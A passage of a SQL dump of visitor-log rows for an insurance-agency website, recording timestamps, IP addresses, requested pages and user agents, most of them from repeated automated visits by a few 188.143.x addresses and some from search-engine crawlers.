41','ru','','','','','','','0','0',0),(12318,'0b_86591f709cc886470d4b952b207fc3ce','1459766897','188.143.232.32','188.143.232.32','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12321,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459766899','188.143.234.155','188.143.234.155','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12324,'0b_86591f709cc886470d4b952b207fc3ce','1459766907','188.143.232.32','188.143.232.32','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12327,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459766909','188.143.234.155','188.143.234.155','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12329,'0b_86591f709cc886470d4b952b207fc3ce','1459766917','188.143.232.32','188.143.232.32','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12332,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459766920','188.143.234.155','188.143.234.155','/igo/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12333,'0b_86591f709cc886470d4b952b207fc3ce','1459766928','188.143.232.32','188.143.232.32','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12335,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459766931','188.143.234.155','188.143.234.155','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12338,'0b_86591f709cc886470d4b952b207fc3ce','1459766940','188.143.232.32','188.143.232.32','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12341,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459766942','188.143.234.155','188.143.234.155','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12344,'0b_86591f709cc886470d4b952b207fc3ce','1459766950','188.143.232.32','188.143.232.32','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12345,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459766952','188.143.234.155','188.143.234.155','/members','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12348,'0b_86591f709cc886470d4b952b207fc3ce','1459766961','188.143.232.32','188.143.232.32','/igo/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12351,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459766962','188.143.234.155','188.143.234.155','/members/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12354,'0b_86591f709cc886470d4b952b207fc3ce','1459766971','188.143.232.32','188.143.232.32','/aig-releases-new-term-rates-and-re-enters-ny','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12356,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459766973','188.143.234.155','188.143.234.155','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12357,'0b_86591f709cc886470d4b952b207fc3ce','1459766981','188.143.232.32','188.143.232.32','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12359,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459766983','188.143.234.155','188.143.234.155','/?page_id=169','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12362,'0b_86591f709cc886470d4b952b207fc3ce','1459766992','188.143.232.32','188.143.232.32','/?page_id=169','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12365,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459766993','188.143.234.155','188.143.234.155','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12366,'0b_86591f709cc886470d4b952b207fc3ce','1459767003','188.143.232.32','188.143.232.32','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12369,'0b_86591f709cc886470d4b952b207fc3ce','1459767013','188.143.232.32','188.143.232.32','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12371,'0b_3d7cae85b64753fade7803da25aa9eb1','1459767340','188.143.232.32','188.143.232.32','/igo/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12374,'0b_3d7cae85b64753fade7803da25aa9eb1','1459767405','188.143.232.32','188.143.232.32','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12377,'0b_3d7cae85b64753fade7803da25aa9eb1','1459767416','188.143.232.32','188.143.232.32','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12380,'0b_3d7cae85b64753fade7803da25aa9eb1','1459767426','188.143.232.32','188.143.232.32','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12381,'0b_3d7cae85b64753fade7803da25aa9eb1','1459767436','188.143.232.32','188.143.232.32','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12384,'0b_3d7cae85b64753fade7803da25aa9eb1','1459767447','188.143.232.32','188.143.232.32','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12386,'0b_3d7cae85b64753fade7803da25aa9eb1','1459767457','188.143.232.32','188.143.232.32','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12389,'0b_3d7cae85b64753fade7803da25aa9eb1','1459767468','188.143.232.32','188.143.232.32','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12390,'0b_3d7cae85b64753fade7803da25aa9eb1','1459767479','188.143.232.32','188.143.232.32','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12393,'0b_3d7cae85b64753fade7803da25aa9eb1','1459767489','188.143.232.32','188.143.232.32','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12395,'0b_b8894d8da2eec03d5aaa705f2e36d5d1','1459767508','208.115.111.66','208-115-111-66-reverse.wowrack.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(12398,'0b_3d7cae85b64753fade7803da25aa9eb1','1459767501','188.143.232.32','188.143.232.32','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12399,'0b_3d7cae85b64753fade7803da25aa9eb1','1459767511','188.143.232.32','188.143.232.32','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12402,'0b_3d7cae85b64753fade7803da25aa9eb1','1459767522','188.143.232.32','188.143.232.32','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12404,'0b_3d7cae85b64753fade7803da25aa9eb1','1459767533','188.143.232.32','188.143.232.32','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12407,'0b_3d7cae85b64753fade7803da25aa9eb1','1459767543','188.143.232.32','188.143.232.32','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12408,'0b_3d7cae85b64753fade7803da25aa9eb1','1459767554','188.143.232.32','188.143.232.32','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12411,'0b_3d7cae85b64753fade7803da25aa9eb1','1459767564','188.143.232.32','188.143.232.32','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12413,'0b_3d7cae85b64753fade7803da25aa9eb1','1459767573','188.143.232.27','188.143.232.27','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12416,'0b_d506722d9f7624207b46827652df0d28','1459767583','157.55.39.161','msnbot-157-55-39-161.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(12419,'0b_3d7cae85b64753fade7803da25aa9eb1','1459767575','188.143.232.32','188.143.232.32','/igo','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12422,'0b_3d7cae85b64753fade7803da25aa9eb1','1459767585','188.143.232.32','188.143.232.32','/igo/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12423,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459767597','188.143.234.155','188.143.234.155','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12425,'0b_c5825929c215d193dda4a0941bcd3823','1459767607','188.143.234.155','188.143.234.155','/?page_id=169','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12428,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767609','188.143.232.27','188.143.232.27','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12429,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767617','188.143.232.27','188.143.232.27','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','http://www.empireins.com/agent-tools/','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12432,'0b_c5825929c215d193dda4a0941bcd3823','1459767618','188.143.234.155','188.143.234.155','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12434,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767641','188.143.232.27','188.143.232.27','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12435,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767649','188.143.232.27','188.143.232.27','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','http://www.empireins.com/case-status/','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12437,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767652','188.143.232.27','188.143.232.27','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12438,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767660','188.143.232.27','188.143.232.27','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12441,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767662','188.143.232.27','188.143.232.27','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12443,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767673','188.143.232.27','188.143.232.27','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12444,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767673','188.143.232.32','188.143.232.32','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12447,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767684','188.143.232.27','188.143.232.27','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12450,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767684','188.143.232.32','188.143.232.32','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12453,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767694','188.143.232.32','188.143.232.32','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12456,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767694','188.143.232.27','188.143.232.27','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12458,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767705','188.143.232.32','188.143.232.32','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12459,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767705','188.143.232.27','188.143.232.27','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12461,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767715','188.143.232.32','188.143.232.32','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12464,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767715','188.143.232.27','188.143.232.27','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12465,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767726','188.143.232.32','188.143.232.32','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12467,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767726','188.143.232.27','188.143.232.27','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12468,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767736','188.143.232.32','188.143.232.32','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12470,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767747','188.143.232.32','188.143.232.32','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12473,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767747','188.143.232.27','188.143.232.27','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12474,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767758','188.143.232.27','188.143.232.27','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12476,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767759','188.143.232.32','188.143.232.32','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12479,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767769','188.143.232.32','188.143.232.32','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12480,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767779','188.143.232.27','188.143.232.27','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12482,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767780','188.143.232.32','188.143.232.32','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12485,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767790','188.143.232.27','188.143.232.27','/igo/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12486,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767790','188.143.232.32','188.143.232.32','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12489,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767801','188.143.232.27','188.143.232.27','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12491,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767801','188.143.232.32','188.143.232.32','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12492,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767811','188.143.232.27','188.143.232.27','/agent-tools','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12495,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767811','188.143.232.32','188.143.232.32','/igo/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12497,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767821','188.143.232.27','188.143.232.27','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12500,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767822','188.143.232.32','188.143.232.32','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12501,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767832','188.143.232.27','188.143.232.27','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12503,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767832','188.143.232.32','188.143.232.32','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12506,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767842','188.143.232.27','188.143.232.27','/?page_id=169','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12507,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767843','188.143.232.32','188.143.232.32','/case-status','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12510,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767852','188.143.232.27','188.143.232.27','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12513,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767853','188.143.232.32','188.143.232.32','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12515,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767863','188.143.232.32','188.143.232.32','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12518,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767873','188.143.232.32','188.143.232.32','/?page_id=169','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12519,'0b_270be014b4cf0b4f0a8785db64788aa5','1459767883','188.143.232.32','188.143.232.32','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12522,'0b_270be014b4cf0b4f0a8785db64788aa5','1459768447','188.143.232.27','188.143.232.27','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12525,'0b_c5825929c215d193dda4a0941bcd3823','1459768514','188.143.234.155','188.143.234.155','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12528,'0b_c5825929c215d193dda4a0941bcd3823','1459768526','188.143.234.155','188.143.234.155','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12531,'0b_c5825929c215d193dda4a0941bcd3823','1459768537','188.143.234.155','188.143.234.155','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12534,'0b_c5825929c215d193dda4a0941bcd3823','1459768548','188.143.234.155','188.143.234.155','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12536,'0b_c5825929c215d193dda4a0941bcd3823','1459768559','188.143.234.155','188.143.234.155','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12539,'0b_c5825929c215d193dda4a0941bcd3823','1459768570','188.143.234.155','188.143.234.155','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12542,'0b_c5825929c215d193dda4a0941bcd3823','1459768581','188.143.234.155','188.143.234.155','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12545,'0b_c5825929c215d193dda4a0941bcd3823','1459768593','188.143.234.155','188.143.234.155','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (Windows NT 